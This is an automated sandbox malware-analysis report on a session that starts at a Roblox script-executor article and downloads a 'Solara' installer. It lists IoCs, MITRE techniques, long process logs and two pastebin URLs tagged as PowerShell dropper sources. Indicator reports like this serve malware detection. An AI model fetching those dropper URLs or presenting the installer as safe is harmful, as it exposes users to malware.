hxxps://www[.]thegamer[.]com/best-roblox-script-executors/

Analysis

max time kernel
168s
max time network
174s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
28/09/2024, 13:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.thegamer.com/best-roblox-script-executors/

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://pastebin.com/raw/pscHXiNh

exe.dropper

https://pastebin.com/raw/yrjNBPWX

Signatures

Executes dropped EXE 1 IoCs

pid	Process
1904	Solara_Installer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
112	pastebin.com
301	pastebin.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4448	powershell.exe
5736	powershell.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 59 IoCs

evasion

pid	Process
5664	taskkill.exe
5068	taskkill.exe
5328	taskkill.exe
6080	taskkill.exe
6060	taskkill.exe
3340	taskkill.exe
2516	taskkill.exe
5996	taskkill.exe
5176	taskkill.exe
5796	taskkill.exe
6104	taskkill.exe
5256	taskkill.exe
6028	taskkill.exe
5068	taskkill.exe
5428	taskkill.exe
5884	taskkill.exe
5620	taskkill.exe
5884	taskkill.exe
6136	taskkill.exe
5324	taskkill.exe
1176	taskkill.exe
5424	taskkill.exe
6116	taskkill.exe
6084	taskkill.exe
6112	taskkill.exe
5292	taskkill.exe
5372	taskkill.exe
1440	taskkill.exe
6028	taskkill.exe
5228	taskkill.exe
5752	taskkill.exe
5508	taskkill.exe
5984	taskkill.exe
5928	taskkill.exe
224	taskkill.exe
5816	taskkill.exe
5556	taskkill.exe
5972	taskkill.exe
6016	taskkill.exe
5448	taskkill.exe
5644	taskkill.exe
5708	taskkill.exe
5168	taskkill.exe
6088	taskkill.exe
5408	taskkill.exe
5512	taskkill.exe
5840	taskkill.exe
5784	taskkill.exe
5868	taskkill.exe
5900	taskkill.exe
5280	taskkill.exe
5472	taskkill.exe
5528	taskkill.exe
5196	taskkill.exe
1476	taskkill.exe
5384	taskkill.exe
5212	taskkill.exe
5268	taskkill.exe
4448	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4272559161-3282441186-401869126-1000\{784100B9-ED60-4087-A800-1BE6D90C1D4F}	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\SolaraInstaller.zip:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
2908	msedge.exe
2908	msedge.exe
3360	msedge.exe
3360	msedge.exe
1064	identity_helper.exe
1064	identity_helper.exe
3308	msedge.exe
3308	msedge.exe
5056	msedge.exe
5056	msedge.exe
2404	msedge.exe
2404	msedge.exe
4424	msedge.exe
4424	msedge.exe
4424	msedge.exe
4424	msedge.exe
4448	powershell.exe
4448	powershell.exe
4448	powershell.exe
1092	powershell.exe
1092	powershell.exe
1092	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 38 IoCs

pid	Process
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe

Suspicious use of AdjustPrivilegeToken 36 IoCs

description	pid	Process
Token: SeRestorePrivilege	5108	7zG.exe
Token: 35	5108	7zG.exe
Token: SeSecurityPrivilege	5108	7zG.exe
Token: SeSecurityPrivilege	5108	7zG.exe
Token: SeDebugPrivilege	1476	taskkill.exe
Token: SeDebugPrivilege	4448	powershell.exe
Token: SeDebugPrivilege	5176	taskkill.exe
Token: SeDebugPrivilege	5228	taskkill.exe
Token: SeDebugPrivilege	5280	taskkill.exe
Token: SeDebugPrivilege	5324	taskkill.exe
Token: SeDebugPrivilege	5408	taskkill.exe
Token: SeDebugPrivilege	5512	taskkill.exe
Token: SeDebugPrivilege	5556	taskkill.exe
Token: SeDebugPrivilege	5620	taskkill.exe
Token: SeDebugPrivilege	5664	taskkill.exe
Token: SeDebugPrivilege	5708	taskkill.exe
Token: SeDebugPrivilege	5752	taskkill.exe
Token: SeDebugPrivilege	5796	taskkill.exe
Token: SeDebugPrivilege	5840	taskkill.exe
Token: SeDebugPrivilege	5884	taskkill.exe
Token: SeDebugPrivilege	5928	taskkill.exe
Token: SeDebugPrivilege	5972	taskkill.exe
Token: SeDebugPrivilege	6016	taskkill.exe
Token: SeDebugPrivilege	6060	taskkill.exe
Token: SeDebugPrivilege	6104	taskkill.exe
Token: SeDebugPrivilege	5068	taskkill.exe
Token: SeDebugPrivilege	2516	taskkill.exe
Token: SeDebugPrivilege	5256	taskkill.exe
Token: SeDebugPrivilege	5292	taskkill.exe
Token: SeDebugPrivilege	5372	taskkill.exe
Token: SeDebugPrivilege	5328	taskkill.exe
Token: SeDebugPrivilege	5448	taskkill.exe
Token: SeDebugPrivilege	5424	taskkill.exe
Token: SeDebugPrivilege	5384	taskkill.exe
Token: SeDebugPrivilege	5508	taskkill.exe
Token: SeDebugPrivilege	1092	powershell.exe

Suspicious use of FindShellTrayWindow 56 IoCs

pid	Process
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
5108	7zG.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3360 wrote to memory of 1852	3360	msedge.exe	78
PID 3360 wrote to memory of 1852	3360	msedge.exe	78
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2740	3360	msedge.exe	79
PID 3360 wrote to memory of 2908	3360	msedge.exe	80
PID 3360 wrote to memory of 2908	3360	msedge.exe	80
PID 3360 wrote to memory of 924	3360	msedge.exe	81
PID 3360 wrote to memory of 924	3360	msedge.exe	81
PID 3360 wrote to memory of 924	3360	msedge.exe	81
PID 3360 wrote to memory of 924	3360	msedge.exe	81
PID 3360 wrote to memory of 924	3360	msedge.exe	81
PID 3360 wrote to memory of 924	3360	msedge.exe	81
PID 3360 wrote to memory of 924	3360	msedge.exe	81
PID 3360 wrote to memory of 924	3360	msedge.exe	81
PID 3360 wrote to memory of 924	3360	msedge.exe	81
PID 3360 wrote to memory of 924	3360	msedge.exe	81
PID 3360 wrote to memory of 924	3360	msedge.exe	81
PID 3360 wrote to memory of 924	3360	msedge.exe	81
PID 3360 wrote to memory of 924	3360	msedge.exe	81
PID 3360 wrote to memory of 924	3360	msedge.exe	81
PID 3360 wrote to memory of 924	3360	msedge.exe	81
PID 3360 wrote to memory of 924	3360	msedge.exe	81
PID 3360 wrote to memory of 924	3360	msedge.exe	81
PID 3360 wrote to memory of 924	3360	msedge.exe	81
PID 3360 wrote to memory of 924	3360	msedge.exe	81
PID 3360 wrote to memory of 924	3360	msedge.exe	81

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.thegamer.com/best-roblox-script-executors/
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffce81f3cb8,0x7ffce81f3cc8,0x7ffce81f3cd8
  2⤵
  PID:1852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1924 /prefetch:2
  2⤵
  PID:2740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:8
  2⤵
  PID:924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
  2⤵
  PID:2160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
  2⤵
  PID:5028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4040 /prefetch:1
  2⤵
  PID:3284
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5480 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
  2⤵
  PID:4876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
  2⤵
  PID:4544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5572 /prefetch:8
  2⤵
  PID:5096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5568 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:3308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
  2⤵
  PID:3928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4380 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
  2⤵
  PID:4832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
  2⤵
  PID:1416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
  2⤵
  PID:3556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
  2⤵
  PID:4752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
  2⤵
  PID:4888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
  2⤵
  PID:2688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3008 /prefetch:1
  2⤵
  PID:2928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2616 /prefetch:1
  2⤵
  PID:1492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1696 /prefetch:1
  2⤵
  PID:4104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3108 /prefetch:1
  2⤵
  PID:412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6188 /prefetch:1
  2⤵
  PID:4876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6364 /prefetch:1
  2⤵
  PID:2756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:1
  2⤵
  PID:1036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6336 /prefetch:1
  2⤵
  PID:968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6528 /prefetch:1
  2⤵
  PID:3140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
  2⤵
  PID:1588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6732 /prefetch:1
  2⤵
  PID:404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7052 /prefetch:1
  2⤵
  PID:1532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6708 /prefetch:1
  2⤵
  PID:360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1
  2⤵
  PID:3172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:1
  2⤵
  PID:4652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6976 /prefetch:1
  2⤵
  PID:1520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,4238325797628184883,7569189055281180413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6776 /prefetch:1
  2⤵
  PID:3404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
